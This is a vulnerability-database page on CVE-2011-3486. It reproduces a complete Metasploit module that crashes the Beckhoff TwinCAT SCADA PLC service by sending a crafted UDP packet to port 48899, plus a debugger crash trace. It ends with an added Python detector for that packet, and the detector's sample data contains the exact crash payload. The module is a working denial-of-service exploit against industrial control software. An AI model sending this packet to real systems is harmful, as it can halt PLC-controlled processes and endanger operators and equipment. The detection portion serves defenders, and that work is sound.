Beckhoff TwinCAT SCADA PLC 2.11.0.2004 Denial Of Service

Published: 31 Aug 2024 00:00:00. Reported by Luigi Auriemma, jfa, metasploit.com. Type: packetstorm. Source: packetstormsecurity.com. 259 views.

Beckhoff TwinCAT SCADA PLC 2.11.0.2004 Denial of Service by a crafted UDP packet to port 48899 (TCATSysSrv.exe).

Related

| Family | Title | Published | Source |
|---|---|---|---|
| Circl | CVE-2011-3486 | 14 Sep 2011 00:00 | circl |
| Check Point Advisories | Beckhoff TwinCAT Out-Of-Bounds Read Denial of Service (CVE-2011-3486) | 3 Dec 2012 00:00 | checkpoint_advisories |
| CVE | CVE-2011-3486 | 16 Sep 2011 14:00 | cve |
| Cvelist | CVE-2011-3486 | 16 Sep 2011 14:00 | cvelist |
| ICS | Beckhoff TwinCAT Read Access Violation | 9 Jul 2011 06:00 | ics |
| Metasploit | Beckhoff TwinCAT SCADA PLC 2.11.0.2004 DoS | 10 Oct 2011 23:41 | metasploit |
| NVD | CVE-2011-3486 | 16 Sep 2011 14:28 | nvd |
| Tenable Nessus | Beckhoff Twincat Improper Restriction of Operations within the Bounds of a Memory Buffer | 27 May 2020 00:00 | nessus |
| Tenable Nessus | Beckhoff TwinCAT Read Access Violation (CVE-2011-3486) | 7 Feb 2022 00:00 | nessus |
| Prion | Out-of-bounds | 16 Sep 2011 14:28 | prion |
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Beckhoff TwinCAT SCADA PLC 2.11.0.2004 DoS',
      'Description' => %q{
        The Beckhoff TwinCAT version <= 2.11.0.2004 can be brought down by sending
        a crafted UDP packet to port 48899 (TCATSysSrv.exe).
      },
      'Author'      =>
        [
          'Luigi Auriemma', # Public exploit
          'jfa',            # Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'CVE', '2011-3486' ],
          [ 'OSVDB', '75495' ],
          [ 'URL', 'http://aluigi.altervista.org/adv/twincat_1-adv.txt' ]
        ],
      'DisclosureDate' => '2011-09-13'
    ))

    register_options([Opt::RPORT(48899)])
  end

  def run
    # 4-byte header, 16 zero bytes, then 1514 bytes of 0xff (1534 bytes total)
    dos = "\x03\x66\x14\x71" + "\x00" * 16 + "\xff" * 1514
    connect_udp
    print_status("Sending DoS packet ...")
    udp_sock.put(dos)
    disconnect_udp
  end
end

=begin
0:017> g
(4d4.850): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=02a1f9cf ebx=0037c0a8 ecx=02a0f9cc edx=ffffffff esi=02a0f9b4 edi=00000001
eip=00414f6a esp=02a0f7bc ebp=0000ffff iopl=0 nv up ei pl nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213
*** ERROR: Module load completed but symbols could not be loaded for C:\TwinCAT\TCATSysSrv.exe
TCATSysSrv+0x14f6a:
00414f6a 66833802 cmp word ptr [eax],2 ds:0023:02a1f9cf=????
0:016> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
02a0f7f8 71ab265b TCATSysSrv+0x14f6a
02a0f80c 71ab4a9e WS2_32!Prolog_v1+0x21
02a0f834 7c90df3c WS2_32!WPUQueryBlockingCallback+0x1b
02a0f880 71a5332f ntdll!NtWaitForSingleObject+0xc
02a0f8f4 71abf6e7 mswsock!WSPRecvFrom+0x35c
02a0f938 71ad303a WS2_32!WSARecvFrom+0x7d
02a0f96c 00414b92 WSOCK32!recvfrom+0x39
02a0f988 00000000 TCATSysSrv+0x14b92
=end
```
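The module's `run` method documents the exact shape of the malformed datagram (a 4-byte header `03 66 14 71`, 16 zero bytes, then a long run of `0xff`, sent to UDP/48899). The following is an added example for the defender's side, not code from the Metasploit module or from Vulners: a small offline classifier that flags datagrams of that shape, so an operator can sanity-check an IDS rule idea or triage an exported capture before the service is reachable from an untrusted segment. The `UdpDatagram` type, the `OVERSIZE_THRESHOLD` value and the sample datagrams are constructed for this example and are not taken from the advisory.

```python
# Added example (defender's side), not part of the Metasploit module above or
# of the Vulners page. Packet shape is taken from the module's run method;
# everything else here is an assumption made for illustration.
from dataclasses import dataclass
from typing import List, Tuple

TWINCAT_SYSSRV_PORT = 48899
DOS_HEADER = b"\x03\x66\x14\x71"
# The module sends 4 + 16 + 1514 = 1534 bytes in a single datagram.
PUBLIC_DOS_LENGTH = 4 + 16 + 1514
# Assumption for this example: an unusually large body on this port is
# suspicious on its own. 1000 bytes is an illustrative threshold, not a
# value from the advisory; tune it against real TwinCAT traffic.
OVERSIZE_THRESHOLD = 1000


@dataclass
class UdpDatagram:
    """Minimal view of a captured UDP datagram (constructed type for this example)."""
    src: str
    dport: int
    payload: bytes


def classify(dgram: UdpDatagram) -> List[str]:
    """Return the reasons a datagram resembles the public DoS packet (empty list = no match)."""
    reasons: List[str] = []
    if dgram.dport != TWINCAT_SYSSRV_PORT:
        return reasons  # only the TCATSysSrv service port is in scope
    p = dgram.payload
    if p.startswith(DOS_HEADER):
        reasons.append("header 03661471 matches the public DoS packet")
    if len(p) >= OVERSIZE_THRESHOLD:
        reasons.append(f"payload is {len(p)} bytes (>= {OVERSIZE_THRESHOLD})")
    if len(p) == PUBLIC_DOS_LENGTH:
        reasons.append("length equals the 1534-byte public DoS packet")
    body = p[20:]  # everything after the 4-byte header and 16 zero bytes
    if body and set(body) == {0xFF}:
        reasons.append("body after the 20-byte header is all 0xff")
    return reasons


def scan(dgrams: List[UdpDatagram]) -> List[Tuple[str, List[str]]]:
    """Run classify() over a capture and keep only the datagrams that matched."""
    hits: List[Tuple[str, List[str]]] = []
    for d in dgrams:
        reasons = classify(d)
        if reasons:
            hits.append((d.src, reasons))
    return hits


# Constructed samples: the first mirrors the module's payload byte for byte,
# the other two are benign and must not be flagged.
SAMPLES = [
    UdpDatagram("10.0.0.5", 48899, DOS_HEADER + b"\x00" * 16 + b"\xff" * 1514),
    UdpDatagram("10.0.0.9", 48899, b"\x01\x00\x00\x00" + b"\x00" * 16),  # short request, made up
    UdpDatagram("10.0.0.9", 53, DOS_HEADER + b"\xff" * 2000),            # wrong port, out of scope
]

if __name__ == "__main__":
    for src, reasons in scan(SAMPLES):
        print(src, "->", "; ".join(reasons))
```

Matching on all four indicators at once is what makes the rule useful: the header alone is presumably shared with legitimate TCATSysSrv traffic, while the 1534-byte length and the all-`0xff` body are what distinguish the published crash packet, so a production rule should weight those two higher than the header check.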


Current as of 31 Aug 2024 00:00
Risk: 7 (High)
Vulners AI Score: 7
CVSS 2: 5
EPSS: 0.58413
Views: 259